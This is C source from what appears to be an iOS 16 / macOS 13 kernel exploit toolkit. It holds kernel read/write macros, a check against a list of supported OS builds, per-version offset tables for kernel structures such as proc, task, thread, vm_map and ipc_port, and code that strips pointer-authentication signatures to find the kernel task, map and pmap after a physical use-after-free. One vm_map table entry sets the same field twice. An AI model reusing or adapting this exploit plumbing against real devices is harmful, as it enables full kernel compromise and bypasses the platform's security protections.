// volatile: the underlying memory is shared with the kernel, so every access
// must really hit memory rather than a cached value.
#define static_uget(object, field, object_uaddr) (((volatile struct object*)(object_uaddr))->field)

#define static_uset(object, field, object_uaddr, field_value) \
    do { \
        (((volatile struct object*)(object_uaddr))->field = (field_value)); \
    } while (0)

// Reads 8 bytes at the field's kernel address and reinterprets them as
// field_type; fields larger than a u64 are not supported by this helper.
#define static_kget(object, field_type, field, object_kaddr) \
    ({ \
        u64 buffer = 0; \
        u64 field_kaddr = (u64)(object_kaddr) + static_offsetof(object, field); \
        kread((u64)(kfd), (field_kaddr), (&buffer), (sizeof(buffer))); \
        field_type field_value = *(field_type*)(&buffer); \
        field_value; \
    })

// Writes a full u64 at the field's kernel address.
#define static_kset_u64(object, field, object_kaddr, field_value) \
    do { \
        u64 buffer = field_value; \
        u64 field_kaddr = (u64)(object_kaddr) + static_offsetof(object, field); \
        kwrite((u64)(kfd), (&buffer), (field_kaddr), (sizeof(buffer))); \
    } while (0)

#include "info/static_types/fileglob.h"
#include "info/static_types/fileops.h"
#include "info/static_types/fileproc_guard.h"
#include "info/static_types/fileproc.h"
#include "info/static_types/ipc_entry.h"
#include "info/static_types/ipc_port.h"
#include "info/static_types/ipc_space.h"
#include "info/static_types/miscellaneous_types.h"
#include "info/static_types/pmap.h"
#include "info/static_types/pseminfo.h"
#include "info/static_types/psemnode.h"
#include "info/static_types/semaphore.h"
#include "info/static_types/vm_map_copy.h"
#include "info/static_types/vm_map_entry.h"
#include "info/static_types/vm_named_entry.h"
#include "info/static_types/vm_object.h"
#include "info/static_types/vm_page.h"

/*
 * Supported build numbers, each packed as the little-endian bytes of the
 * "kern.osversion" string in a u64 (e.g. "20A357" -> 0x0000373533413032).
 * info_init() compares the sysctl result against these with a single u64 load.
 */
const u64 ios_16_0_a = 0x0000373533413032; // 20A357
const u64 ios_16_0_b = 0x0000323633413032; // 20A362
const u64 ios_16_0_1 = 0x0000313733413032; // 20A371
const u64 ios_16_0_2 = 0x0000303833413032; // 20A380
const u64 ios_16_0_3 = 0x0000323933413032; // 20A392
const u64 ios_16_1 = 0x0000003238423032;   // 20B82
const u64 ios_16_1_1 = 0x0000313031423032; // 20B101
const u64 ios_16_1_2 = 0x0000303131423032; // 20B110
const u64 ios_16_2 = 0x0000003536433032;   // 20C65
const u64 ios_16_3 = 0x0000003734443032;   // 20D47
const u64 ios_16_3_1 = 0x0000003736443032; // 20D67
const u64 ios_16_4 = 0x0000373432453032;   // 20E247
const u64 ios_16_4_1 = 0x0000323532453032; // 20E252
const u64 ios_16_5 = 0x0000003636463032;   // 20F66
const u64 ios_16_5_1 = 0x0000003537463032; // 20F75

const u64 macos_13_0 = 0x0000303833413232;   // 22A380
const u64 macos_13_0_1 = 0x0000303034413232; // 22A400
const u64 macos_13_1 = 0x0000003536433232;   // 22C65
const u64 macos_13_2 = 0x0000003934443232;   // 22D49
const u64 macos_13_2_1 = 0x0000003836443232; // 22D68
const u64 macos_13_3 = 0x0000323532453232;   // 22E252
const u64 macos_13_3_1 = 0x0000313632453232; // 22E261
const u64 macos_13_4 = 0x0000003636463232;   // 22F66

/*
 * Pointer-authentication helpers. With TCR_EL1.T1SZ = 17, the top 17 bits of a
 * kernel VA are not address bits and may hold a PAC signature; unsign_kaddr()
 * forces them all to 1, turning a signed pointer back into a canonical kernel
 * address (used on task->map and vm_map->pmap in info_run()).
 */
#define t1sz_boot (17ull)
#define ptr_mask ((1ull << (64ull - t1sz_boot)) - 1ull)
#define pac_mask (~ptr_mask)
#define unsign_kaddr(kaddr) ((kaddr) | (pac_mask))

// Marker written at the start of every page of the copy src/dst buffers, so
// their pages are recognizable when scanning PUAF pages.
const char copy_sentinel[16] = "p0up0u was here";
const u64 copy_sentinel_size = sizeof(copy_sentinel);
/*
 * Sets up kfd->info: the vm_copy() source/destination buffers and the process
 * environment (pid, tid, fd limit, OS version index). Aborts via assert_false()
 * on an OS build that has no entry in the *_versions offset tables.
 */
void info_init(struct kfd* kfd)
{
    /*
     * Initialize the "kfd->info.copy" substructure.
     *
     * Note that the vm_copy() in krkw_helper_grab_free_pages() makes the following assumptions:
     * - The copy size is strictly greater than "msg_ool_size_small".
     * - The src vm_object must have a copy_strategy of MEMORY_OBJECT_COPY_NONE.
     * - The dst vm_object must have a copy_strategy of MEMORY_OBJECT_COPY_SYMMETRIC.
     */
    const u64 msg_ool_size_small = (32 * 1024);
    kfd->info.copy.size = pages(4);
    assert(kfd->info.copy.size > msg_ool_size_small);

    // NOTE(review): VM_FLAGS_PURGABLE on the source is presumably what yields
    // the MEMORY_OBJECT_COPY_NONE strategy required above — confirm.
    assert_mach(vm_allocate(mach_task_self(), &kfd->info.copy.src_uaddr, kfd->info.copy.size, VM_FLAGS_ANYWHERE | VM_FLAGS_PURGABLE));
    assert_mach(vm_allocate(mach_task_self(), &kfd->info.copy.dst_uaddr, kfd->info.copy.size, VM_FLAGS_ANYWHERE));
    // Stamp the sentinel at the start of every page so these pages can be
    // recognized later when scanning PUAF pages.
    for (u64 offset = pages(0); offset < kfd->info.copy.size; offset += pages(1)) {
        bcopy(copy_sentinel, (void*)(kfd->info.copy.src_uaddr + offset), copy_sentinel_size);
        bcopy(copy_sentinel, (void*)(kfd->info.copy.dst_uaddr + offset), copy_sentinel_size);
    }

    /*
     * Initialize the "kfd->info.env" substructure.
     *
     * Note that:
     * - We boost the file descriptor limit to "maxfilesperproc".
     * - We use the "vid" as a version index to get the offsets and sizes for dynamic types.
     */
    kfd->info.env.pid = getpid();

    thread_identifier_info_data_t data = {};
    thread_info_t info = (thread_info_t)(&data);
    mach_msg_type_number_t count = THREAD_IDENTIFIER_INFO_COUNT;
    assert_mach(thread_info(mach_thread_self(), THREAD_IDENTIFIER_INFO, info, &count));
    kfd->info.env.tid = data.thread_id;

    // Raise RLIMIT_NOFILE to the system maximum: the krkw methods spray large
    // numbers of file descriptors.
    usize size1 = sizeof(kfd->info.env.maxfilesperproc);
    assert_bsd(sysctlbyname("kern.maxfilesperproc", &kfd->info.env.maxfilesperproc, &size1, NULL, 0));

    struct rlimit rlim = {
        .rlim_cur = kfd->info.env.maxfilesperproc,
        .rlim_max = kfd->info.env.maxfilesperproc
    };
    assert_bsd(setrlimit(RLIMIT_NOFILE, &rlim));

    usize size2 = sizeof(kfd->info.env.osversion);
    assert_bsd(sysctlbyname("kern.osversion", &kfd->info.env.osversion, &size2, NULL, 0));

    // The 8-byte osversion string is compared as a single little-endian u64
    // against the packed build-number constants defined above. The resulting
    // "vid" indexes every *_versions offset table in dynamic_types/.
    switch (*(u64*)(&kfd->info.env.osversion)) {
        case ios_16_3:
        case ios_16_3_1: {
            kfd->info.env.vid = 0;
            kfd->info.env.ios = true;
            break;
        }
        case ios_16_4:
        case ios_16_5:
        case ios_16_5_1: {
            kfd->info.env.vid = 1;
            kfd->info.env.ios = true;
            break;
        }
        case macos_13_1: {
            kfd->info.env.vid = 2;
            kfd->info.env.ios = false;
            break;
        }
        case macos_13_4: {
            kfd->info.env.vid = 3;
            kfd->info.env.ios = false;
            break;
        }
        default: {
            assert_false("unsupported osversion");
        }
    }

    print_i32(kfd->info.env.pid);
    print_u64(kfd->info.env.tid);
    print_u64(kfd->info.env.vid);
    print_bool(kfd->info.env.ios);
    print_string(kfd->info.env.osversion);
    print_u64(kfd->info.env.maxfilesperproc);
}

/*
 * Resolves kernel addresses (proc/task/map/pmap for the current process and,
 * if kfd->info.kaddr.kernel_proc was found earlier, for the kernel too).
 * Requires a working kread primitive and kaddr.current_proc already set
 * (asserted below).
 */
void info_run(struct kfd* kfd)
{
    timer_start();

    /*
     * current_proc() and current_task()
     */
    assert(kfd->info.kaddr.current_proc);
    // Assumes the task structure is allocated immediately after the proc
    // structure in the same allocation, hence "+ dynamic_sizeof(proc)".
    kfd->info.kaddr.current_task = kfd->info.kaddr.current_proc + dynamic_sizeof(proc);
    print_x64(kfd->info.kaddr.current_proc);
    print_x64(kfd->info.kaddr.current_task);

    /*
     * current_map()
     */
    // task->map is PAC-signed in memory; unsign_kaddr() strips the signature.
    u64 signed_map_kaddr = dynamic_kget(task, map, kfd->info.kaddr.current_task);
    kfd->info.kaddr.current_map = unsign_kaddr(signed_map_kaddr);
    print_x64(kfd->info.kaddr.current_map);

    /*
     * current_pmap()
     */
    u64 signed_pmap_kaddr = dynamic_kget(vm_map, pmap, kfd->info.kaddr.current_map);
    kfd->info.kaddr.current_pmap = unsign_kaddr(signed_pmap_kaddr);
    print_x64(kfd->info.kaddr.current_pmap);

    /*
     * current_thread() and current_uthread()
     *
     * Disabled by default: walks the task's thread list comparing thread_id
     * against the tid captured in info_init().
     */
    const bool find_current_thread = false;

    if (find_current_thread) {
        u64 thread_kaddr = dynamic_kget(task, threads_next, kfd->info.kaddr.current_task);

        while (true) {
            u64 tid = dynamic_kget(thread, thread_id, thread_kaddr);
            if (tid == kfd->info.env.tid) {
                kfd->info.kaddr.current_thread = thread_kaddr;
                // Same layout trick as proc/task: uthread follows thread.
                kfd->info.kaddr.current_uthread = thread_kaddr + dynamic_sizeof(thread);
                break;
            }

            thread_kaddr = dynamic_kget(thread, task_threads_next, thread_kaddr);
        }

        print_x64(kfd->info.kaddr.current_thread);
        print_x64(kfd->info.kaddr.current_uthread);
    }

    if (kfd->info.kaddr.kernel_proc) {
        /*
         * kernel_proc() and kernel_task()
         */
        kfd->info.kaddr.kernel_task = kfd->info.kaddr.kernel_proc + dynamic_sizeof(proc);
        print_x64(kfd->info.kaddr.kernel_proc);
        print_x64(kfd->info.kaddr.kernel_task);

        /*
         * kernel_map()
         */
        u64 signed_map_kaddr = dynamic_kget(task, map, kfd->info.kaddr.kernel_task);
        kfd->info.kaddr.kernel_map = unsign_kaddr(signed_map_kaddr);
        print_x64(kfd->info.kaddr.kernel_map);

        /*
         * kernel_pmap()
         */
        u64 signed_pmap_kaddr = dynamic_kget(vm_map, pmap, kfd->info.kaddr.kernel_map);
        kfd->info.kaddr.kernel_pmap = unsign_kaddr(signed_pmap_kaddr);
        print_x64(kfd->info.kaddr.kernel_pmap);
    }

    timer_end();
}

// Releases the two vm_copy() buffers allocated in info_init().
void info_free(struct kfd* kfd)
{
    assert_mach(vm_deallocate(mach_task_self(), kfd->info.copy.src_uaddr, kfd->info.copy.size));
    assert_mach(vm_deallocate(mach_task_self(), kfd->info.copy.dst_uaddr, kfd->info.copy.size));
}

#endif /* info_h */
/*
 * Copyright (c) 2023 Félix Poulin-Bélanger. All rights reserved.
 */

#ifndef proc_h
#define proc_h

/*
 * Byte-offset table for the kernel's struct proc.
 * Fields hold offsets inside the kernel object; object_size is the size of
 * the allocation (it is also used to locate the adjacent task object:
 * info.h computes task = proc + dynamic_sizeof(proc)).
 */
struct proc {
    u64 p_list_le_next;    /* p_list LIST_ENTRY forward link */
    u64 p_list_le_prev;    /* p_list LIST_ENTRY back link */
    u64 p_pid;
    u64 p_fd_fd_ofiles;    /* presumably the flattened proc->p_fd.fd_ofiles offset — TODO confirm */
    u64 object_size;
};

/* One row per supported kernel version; only object_size varies. */
const struct proc proc_versions[] = {
    { .p_list_le_next = 0x0, .p_list_le_prev = 0x8, .p_pid = 0x60, .p_fd_fd_ofiles = 0xf8, .object_size = 0x538 },
    { .p_list_le_next = 0x0, .p_list_le_prev = 0x8, .p_pid = 0x60, .p_fd_fd_ofiles = 0xf8, .object_size = 0x730 },
    { .p_list_le_next = 0x0, .p_list_le_prev = 0x8, .p_pid = 0x60, .p_fd_fd_ofiles = 0xf8, .object_size = 0x580 },
    { .p_list_le_next = 0x0, .p_list_le_prev = 0x8, .p_pid = 0x60, .p_fd_fd_ofiles = 0xf8, .object_size = 0x778 },
};

/* In-kernel C types of the fields above; note p_pid is a signed 32-bit pid_t. */
typedef u64 proc_p_list_le_next_t;
typedef u64 proc_p_list_le_prev_t;
typedef i32 proc_p_pid_t;
typedef u64 proc_p_fd_fd_ofiles_t;

#endif /* proc_h */
/*
 * Copyright (c) 2023 Félix Poulin-Bélanger. All rights reserved.
 */

#ifndef task_h
#define task_h

/*
 * Byte-offset table for the kernel's struct task.
 * info.h reads task->map (then unsigns the PAC'd pointer) to find the
 * task's vm_map, and walks threads_next to enumerate threads.
 */
struct task {
    u64 map;              /* signed pointer to the task's vm_map */
    u64 threads_next;     /* thread list head, forward link */
    u64 threads_prev;     /* thread list head, back link */
    u64 itk_space;        /* task's ipc_space */
    u64 object_size;
};

/* One row per supported kernel version; only object_size varies. */
const struct task task_versions[] = {
    { .map = 0x28, .threads_next = 0x58, .threads_prev = 0x60, .itk_space = 0x300, .object_size = 0x648 },
    { .map = 0x28, .threads_next = 0x58, .threads_prev = 0x60, .itk_space = 0x300, .object_size = 0x640 },
    { .map = 0x28, .threads_next = 0x58, .threads_prev = 0x60, .itk_space = 0x300, .object_size = 0x658 },
    { .map = 0x28, .threads_next = 0x58, .threads_prev = 0x60, .itk_space = 0x300, .object_size = 0x658 },
};

/* In-kernel C types of the fields above. */
typedef u64 task_map_t;
typedef u64 task_threads_next_t;
typedef u64 task_threads_prev_t;
typedef u64 task_itk_space_t;

#endif /* task_h */
/*
 * Copyright (c) 2023 Félix Poulin-Bélanger. All rights reserved.
 */

#ifndef thread_h
#define thread_h

/*
 * Byte-offset table for the kernel's struct thread.
 * info.h walks task_threads_next and compares thread_id against the
 * caller's tid to locate the current thread.
 */
struct thread {
    u64 task_threads_next;    /* link in the owning task's thread list */
    u64 task_threads_prev;
    u64 map;
    u64 thread_id;            /* unique 64-bit thread id (matches userland tid) */
    u64 object_size;
};

/* One row per supported kernel version; offsets shift between major releases. */
const struct thread thread_versions[] = {
    { .task_threads_next = 0x368, .task_threads_prev = 0x370, .map = 0x380, .thread_id = 0x420, .object_size = 0x4c8 },
    { .task_threads_next = 0x368, .task_threads_prev = 0x370, .map = 0x380, .thread_id = 0x418, .object_size = 0x4c0 },
    { .task_threads_next = 0x3c0, .task_threads_prev = 0x3c8, .map = 0x3d8, .thread_id = 0x490, .object_size = 0x650 },
    { .task_threads_next = 0x3c0, .task_threads_prev = 0x3c8, .map = 0x3d8, .thread_id = 0x490, .object_size = 0x650 },
};

/* In-kernel C types of the fields above. */
typedef u64 thread_task_threads_next_t;
typedef u64 thread_task_threads_prev_t;
typedef u64 thread_map_t;
typedef u64 thread_thread_id_t;

#endif /* thread_h */

/*
 * Copyright (c) 2023 Félix Poulin-Bélanger. All rights reserved.
 */

#ifndef uthread_h
#define uthread_h

/*
 * Size-only table for the kernel's struct uthread. Only object_size is
 * needed: info.h computes uthread = thread + dynamic_sizeof(thread),
 * i.e. the uthread is allocated immediately after its thread object.
 */
struct uthread {
    u64 object_size;
};

/* One row per supported kernel version. */
const struct uthread uthread_versions[] = {
    { .object_size = 0x200 },
    { .object_size = 0x200 },
    { .object_size = 0x1b0 },
    { .object_size = 0x1b0 },
};

#endif /* uthread_h */
/*
 * Copyright (c) 2023 Félix Poulin-Bélanger. All rights reserved.
 */

#ifndef vm_map_h
#define vm_map_h

#include "../static_types/vm_map_copy.h"

/*
 * Byte-offset table for the kernel's struct _vm_map.
 * info.h reads vm_map->pmap (then unsigns the PAC'd pointer) to find the
 * current/kernel pmap. hdr_nentries and hdr_nentries_u64 share offset 0x30:
 * the former is read as i32, the latter as u64 (see the typedefs below).
 */
struct vm_map {
    u64 hdr_links_prev;
    u64 hdr_links_next;
    u64 min_offset;                   /* hdr.links.start */
    u64 max_offset;                   /* hdr.links.end */
    u64 hdr_nentries;
    u64 hdr_nentries_u64;             /* same offset as hdr_nentries, u64-width access */
    u64 hdr_rb_head_store_rbh_root;
    u64 pmap;
    u64 hint;
    u64 hole_hint;
    u64 holes_list;
    u64 object_size;
};

/*
 * One row per supported kernel version. The tail of the map (hint /
 * hole_hint / holes_list) moved down by 0x18 in the later two layouts.
 */
const struct vm_map vm_map_versions[] = {
    {
        .hdr_links_prev = 0x10,
        .hdr_links_next = 0x18,
        .min_offset = 0x20,
        .max_offset = 0x28,
        .hdr_nentries = 0x30,
        .hdr_nentries_u64 = 0x30,
        .hdr_rb_head_store_rbh_root = 0x38,
        .pmap = 0x40,
        .hint = 0x98,
        .hole_hint = 0xa0,
        .holes_list = 0xa8,
        .object_size = 0xc0,
    },
    {
        .hdr_links_prev = 0x10,
        .hdr_links_next = 0x18,
        .min_offset = 0x20,
        .max_offset = 0x28,
        .hdr_nentries = 0x30,
        .hdr_nentries_u64 = 0x30,
        .hdr_rb_head_store_rbh_root = 0x38,
        .pmap = 0x40,
        .hint = 0x98,
        .hole_hint = 0xa0,
        .holes_list = 0xa8,
        .object_size = 0xc0,
    },
    {
        .hdr_links_prev = 0x10,
        .hdr_links_next = 0x18,
        .min_offset = 0x20,
        .max_offset = 0x28,
        .hdr_nentries = 0x30,
        .hdr_nentries_u64 = 0x30,
        .hdr_rb_head_store_rbh_root = 0x38,
        .pmap = 0x40,
        .hint = 0x80,
        .hole_hint = 0x88,
        .holes_list = 0x90,
        .object_size = 0xa8,
    },
    {
        .hdr_links_prev = 0x10,
        .hdr_links_next = 0x18,
        .min_offset = 0x20,
        .max_offset = 0x28,
        .hdr_nentries = 0x30,
        .hdr_nentries_u64 = 0x30,
        .hdr_rb_head_store_rbh_root = 0x38,
        .hdr_rb_head_store_rbh_root = 0x38,
        .pmap = 0x40,
        .hint = 0x80,
        .hole_hint = 0x88,
        .holes_list = 0x90,
        .object_size = 0xa8,
    },
};

/* In-kernel C types of the fields above; nentries is a signed 32-bit count. */
typedef u64 vm_map_hdr_links_prev_t;
typedef u64 vm_map_hdr_links_next_t;
typedef u64 vm_map_min_offset_t;
typedef u64 vm_map_max_offset_t;
typedef i32 vm_map_hdr_nentries_t;
typedef u64 vm_map_hdr_nentries_u64_t;
typedef u64 vm_map_hdr_rb_head_store_rbh_root_t;
typedef u64 vm_map_pmap_t;
typedef u64 vm_map_hint_t;
typedef u64 vm_map_hole_hint_t;
typedef u64 vm_map_holes_list_t;
/*
 * Full userland mirror of the kernel's struct _vm_map, for bulk kread()
 * of a whole map object (as opposed to the per-field offset table above).
 * The lock is kept as an opaque u64[2] blob. Field order and bitfield
 * packing must match the kernel layout exactly — do not reorder.
 */
struct _vm_map {
    u64 lock[2];
    struct vm_map_header hdr;
    u64 pmap;
    u64 size;
    u64 size_limit;
    u64 data_limit;
    u64 user_wire_limit;
    u64 user_wire_size;
#if TARGET_MACOS
    u64 vmmap_high_start;
#else /* TARGET_MACOS */
    u64 user_range[4];
#endif /* TARGET_MACOS */
    union {
        u64 vmu1_highest_entry_end;
        u64 vmu1_lowest_unnestable_start;
    } vmu1;
    u64 hint;
    union {
        u64 vmmap_hole_hint;
        u64 vmmap_corpse_footprint;
    } vmmap_u_1;
    union {
        u64 _first_free;
        u64 _holes;
    } f_s;
    u32 map_refcnt;
    u32
        wait_for_space:1,
        wiring_required:1,
        no_zero_fill:1,
        mapped_in_other_pmaps:1,
        switch_protect:1,
        disable_vmentry_reuse:1,
        map_disallow_data_exec:1,
        holelistenabled:1,
        is_nested_map:1,
        map_disallow_new_exec:1,
        jit_entry_exists:1,
        has_corpse_footprint:1,
        terminated:1,
        is_alien:1,
        cs_enforcement:1,
        cs_debugged:1,
        reserved_regions:1,
        single_jit:1,
        never_faults:1,
        uses_user_ranges:1,
        pad:12;
    u32 timestamp;
};

/*
 * Debug helper: dump every interpreted field of an already-kread map copy.
 * map_kaddr is the kernel address the struct was read from (label only).
 * Fields are printed in declaration order; unions print one member each.
 */
void print_vm_map(struct kfd* kfd, struct _vm_map* map, u64 map_kaddr)
{
    print_message("struct _vm_map @ %016llx", map_kaddr);
    print_x64(map->hdr.links.prev);
    print_x64(map->hdr.links.next);
    print_x64(map->hdr.links.start);
    print_x64(map->hdr.links.end);
    print_i32(map->hdr.nentries);
    print_u16(map->hdr.page_shift);
    print_bool(map->hdr.entries_pageable);
    print_x64(map->hdr.rb_head_store.rbh_root);
    print_x64(map->pmap);
    print_x64(map->size);
    print_x64(map->size_limit);
    print_x64(map->data_limit);
    print_x64(map->user_wire_limit);
    print_x64(map->user_wire_size);
    print_x64(map->vmu1.vmu1_lowest_unnestable_start);
    print_x64(map->hint);
    print_x64(map->vmmap_u_1.vmmap_hole_hint);
    print_x64(map->f_s._holes);
    print_u32(map->map_refcnt);
    print_bool(map->wait_for_space);
    print_bool(map->wiring_required);
    print_bool(map->no_zero_fill);
    print_bool(map->mapped_in_other_pmaps);
    print_bool(map->switch_protect);
    print_bool(map->disable_vmentry_reuse);
    print_bool(map->map_disallow_data_exec);
    print_bool(map->holelistenabled);
    print_bool(map->is_nested_map);
    print_bool(map->map_disallow_new_exec);
    print_bool(map->jit_entry_exists);
    print_bool(map->has_corpse_footprint);
    print_bool(map->terminated);
    print_bool(map->is_alien);
    print_bool(map->cs_enforcement);
    print_bool(map->cs_debugged);
    print_bool(map->reserved_regions);
    print_bool(map->single_jit);
    print_bool(map->never_faults);
    print_bool(map->uses_user_ranges);
    print_u32(map->timestamp);
}

#endif /* vm_map_h */
/*
 * Copyright (c) 2023 Félix Poulin-Bélanger. All rights reserved.
 */

#ifndef fileglob_h
#define fileglob_h

/*
 * Userland mirror of the kernel's struct fileglob (the per-open-file
 * object shared by all fileprocs that dup the same descriptor).
 * Pointer-sized kernel fields are held as u64; fg_lock is an opaque blob.
 */
struct fileglob {
    struct {
        u64 le_next;
        u64 le_prev;
    } _msglist;
    u32 fg_flag;
    u32 fg_count;       /* reference count */
    u32 fg_msgcount;
    i32 fg_lflags;
    u64 fg_cred;
    u64 fg_ops;         /* pointer to a struct fileops (see below) */
    i64 fg_offset;
    u64 fg_data;        /* type-specific payload, interpreted per fg_ops->fo_type */
    u64 fg_vn_data;
    u64 fg_lock[2];
};

#endif /* fileglob_h */

/*
 * Copyright (c) 2023 Félix Poulin-Bélanger. All rights reserved.
 */


#ifndef fileops_h
#define fileops_h

/*
 * File descriptor types, mirroring XNU's DTYPE_* values
 * (explicitly starting at 1; 0 is not a valid type).
 */
typedef enum {
    DTYPE_VNODE = 1,
    DTYPE_SOCKET,
    DTYPE_PSXSHM,
    DTYPE_PSXSEM,
    DTYPE_KQUEUE,
    DTYPE_PIPE,
    DTYPE_FSEVENTS,
    DTYPE_ATALK,
    DTYPE_NETPOLICY,
    DTYPE_CHANNEL,
    DTYPE_NEXUS
} file_type_t;

/*
 * Mirror of the kernel's fileops dispatch table: the type tag followed by
 * the per-type operation function pointers.
 */
struct fileops {
    file_type_t fo_type;
    void* fo_read;
    void* fo_write;
    void* fo_ioctl;
    void* fo_select;
    void* fo_close;
    void* fo_kqfilter;
    void* fo_drain;
};

#endif /* fileops_h */
/*
 * Copyright (c) 2023 Félix Poulin-Bélanger. All rights reserved.
 */

#ifndef fileproc_h
#define fileproc_h

/*
 * Userland mirror of the kernel's struct fileproc (per-process descriptor
 * entry). fp_glob points at the shared fileglob. For guarded descriptors
 * the union holds fp_guard (presumably a pointer to a fileproc_guard —
 * see fileproc_guard.h; TODO confirm), otherwise fp_wset.
 */
struct fileproc {
    u32 fp_iocount;
    u32 fp_vflags;
    u16 fp_flags;
    u16 fp_guard_attrs;    /* nonzero when the descriptor is guarded */
    u64 fp_glob;
    union {
        u64 fp_wset;
        u64 fp_guard;
    };
};

#endif /* fileproc_h */

/*
 * Copyright (c) 2023 Félix Poulin-Bélanger. All rights reserved.
 */

#ifndef fileproc_guard_h
#define fileproc_guard_h

/* Mirror of the out-of-line guard state referenced by fileproc.fp_guard. */
struct fileproc_guard {
    u64 fpg_wset;
    u64 fpg_guard;    /* the guard value registered for the descriptor */
};

#endif /* fileproc_guard_h */

/*
 * Copyright (c) 2023 Félix Poulin-Bélanger. All rights reserved.
 */

#ifndef ipc_entry_h
#define ipc_entry_h

/*
 * Userland mirror of one slot of an ipc_space's entry table.
 * ie_object points at the underlying ipc object (e.g. an ipc_port);
 * ie_bits carries the entry's type/right bits. ie_index is declared as a
 * full-width 32-bit bitfield to match the kernel's packing.
 */
struct ipc_entry {
    union {
        u64 ie_object;
        u64 ie_volatile_object;
    };
    u32 ie_bits;
    u32 ie_dist:12;
    u32 ie_index:32;
    union {
        u32 ie_next;       /* free-list link when the slot is unused */
        u32 ie_request;
    };
};

#endif /* ipc_entry_h */
/*
 * Copyright (c) 2023 Félix Poulin-Bélanger. All rights reserved.
 */

#ifndef ipc_port_h
#define ipc_port_h

/*
 * Userland mirror of the kernel's struct ipc_port.
 * The waitq and message queue are kept as an opaque u64[7] blob since this
 * tool does not interpret them. Unions mirror the kernel's overlapping
 * fields (which member is live depends on the port's state bits in
 * ip_object.io_bits).
 */
struct ipc_port {
    struct {
        u32 io_bits;
        u32 io_references;
    } ip_object;
    u64 ip_waitq_and_ip_messages[7];
    union {
        u64 ip_receiver;       /* ipc_space holding the receive right */
        u64 ip_destination;
        u32 ip_timestamp;
    };
    union {
        u64 ip_kobject;        /* kernel object backing a kobject port */
        u64 ip_imp_task;
        u64 ip_sync_inheritor_port;
        u64 ip_sync_inheritor_knote;
        u64 ip_sync_inheritor_ts;
    };
    union {
        i32 ip_pid;
        u64 ip_twe;
        u64 ip_pdrequest;
    };
    u64 ip_nsrequest;
    u64 ip_requests;
    union {
        u64 ip_premsg;
        u64 ip_send_turnstile;
    };
    u64 ip_context;
    u32 ip_impcount;
    u32 ip_mscount;
    u32 ip_srights;     /* send right count */
    u32 ip_sorights;    /* send-once right count */
    union {
        u64 ip_kolabel;
        u64 ip_splabel;
    };
};

#endif /* ipc_port_h */

/*
 * Copyright (c) 2023 Félix Poulin-Bélanger. All rights reserved.
 */

#ifndef ipc_space_h
#define ipc_space_h

/*
 * Userland mirror of the kernel's struct ipc_space (a task's port name
 * table). is_table points at the array of struct ipc_entry slots.
 */
struct ipc_space {
    u64 is_lock[2];
    u32 is_bits;
    u32 is_table_hashed;
    u32 is_table_free;
    u64 is_table;       /* pointer to the ipc_entry array */
    u64 is_task;        /* owning task */
    u64 is_grower;
    u64 is_label;
    u32 is_low_mod;
    u32 is_high_mod;
    struct {
        u32 seed[4];
        u32 state;
        u64 lock[2];
    } bool_gen;
    u32 is_entropy[1];
    i32 is_node_id;
};

#endif /* ipc_space_h */
/*
 * Copyright (c) 2023 Félix Poulin-Bélanger. All rights reserved.
 */

#ifndef miscellaneous_types_h
#define miscellaneous_types_h

/* fp_guard_attrs bit — NOTE(review): presumably "guard checks required"; TODO confirm against XNU guarded_open. */
#define GUARD_REQUIRED (1u << 1)

/*
 * kqueue stuff
 */

/* Commands for the kqueue workloop ctl interface (used by kread_kqueue_workloop_ctl). */
#define KQ_WORKLOOP_CREATE 0x01
#define KQ_WORKLOOP_DESTROY 0x02

/* Flags for kqueue_workloop_params.kqwlp_flags selecting which fields are set. */
#define KQ_WORKLOOP_CREATE_SCHED_PRI 0x01
#define KQ_WORKLOOP_CREATE_SCHED_POL 0x02
#define KQ_WORKLOOP_CREATE_CPU_PERCENT 0x04

/* Packed argument structure for workloop create/destroy; layout must match the kernel ABI exactly. */
struct kqueue_workloop_params {
    i32 kqwlp_version;        /* caller sets this to sizeof(struct kqueue_workloop_params) — TODO confirm */
    i32 kqwlp_flags;          /* KQ_WORKLOOP_CREATE_* bits */
    u64 kqwlp_id;             /* dynamic kqueue id */
    i32 kqwlp_sched_pri;
    i32 kqwlp_sched_pol;
    i32 kqwlp_cpu_percent;
    i32 kqwlp_cpu_refillms;
} __attribute__((packed));

/* kqueue kq_state flag bits (16-bit field, mirrors the kernel's values). */
__options_decl(kq_state_t, u16, {
    KQ_SLEEP = 0x0002,
    KQ_PROCWAIT = 0x0004,
    KQ_KEV32 = 0x0008,
    KQ_KEV64 = 0x0010,
    KQ_KEV_QOS = 0x0020,
    KQ_WORKQ = 0x0040,
    KQ_WORKLOOP = 0x0080,
    KQ_PROCESSING = 0x0100,
    KQ_DRAIN = 0x0200,
    KQ_DYNAMIC = 0x0800,
    KQ_R2K_ARMED = 0x1000,
    KQ_HAS_TURNSTILE = 0x2000,
});

/*
 * proc_info stuff
 */

/* Call numbers for the proc_info syscall family. */
#define PROC_INFO_CALL_LISTPIDS 0x1
#define PROC_INFO_CALL_PIDINFO 0x2
#define PROC_INFO_CALL_PIDFDINFO 0x3
#define PROC_INFO_CALL_KERNMSGBUF 0x4
#define PROC_INFO_CALL_SETCONTROL 0x5
#define PROC_INFO_CALL_PIDFILEPORTINFO 0x6
#define PROC_INFO_CALL_TERMINATE 0x7
#define PROC_INFO_CALL_DIRTYCONTROL 0x8
#define PROC_INFO_CALL_PIDRUSAGE 0x9
#define PROC_INFO_CALL_PIDORIGINATORINFO 0xa
#define PROC_INFO_CALL_LISTCOALITIONS 0xb
#define PROC_INFO_CALL_CANUSEFGHW 0xc
#define PROC_INFO_CALL_PIDDYNKQUEUEINFO 0xd
#define PROC_INFO_CALL_UDATA_INFO 0xe
#define PROC_INFO_CALL_SET_DYLD_IMAGES 0xf
#define PROC_INFO_CALL_TERMINATE_RSR 0x10
